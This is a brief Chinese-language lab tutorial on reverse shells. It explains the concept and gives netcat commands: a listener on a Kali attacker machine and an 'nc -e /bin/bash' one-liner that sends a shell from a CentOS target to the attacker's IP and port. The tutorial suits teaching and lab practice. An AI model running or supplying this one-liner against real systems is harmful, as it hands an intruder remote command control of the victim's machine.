目录
前言
反弹shell
攻击机监听本机端口
被攻击机发起连接
攻击机操作
前言
反弹shell是一种网络技术,主要用于在攻击者和被攻击者之间建立命令行的输入输出控制通道。与常规的远程连接方式不同,反弹shell是由被攻击者主动向外连接攻击者,而不是由攻击者连接到被攻击者。
反弹shell通常用于被控端受到防火墙限制、无法接受外部连接、或者IP地址动态变化等情况。这种技术确保即使被控设备位于内部网络中,或者由于某些安全限制无法被直接访问时,攻击者依然能够实现远程控制。
反弹shell
攻击机kali ip 192.168.100.222
被攻击机centos ip 192.168.100.130
攻击机监听本机端口
nc -lvp 空闲端口
nc -lvp 4444
被攻击机发起连接
nc -e /bin/bash 攻击机ip 攻击机监听端口
nc -e /bin/bash 192.168.100.222 4444
如果没有报错或者退出当前命令行,说明连接建立成功
攻击机操作
回到攻击机:
结果显示连接成功
这是就可以进行进一步命令操作了: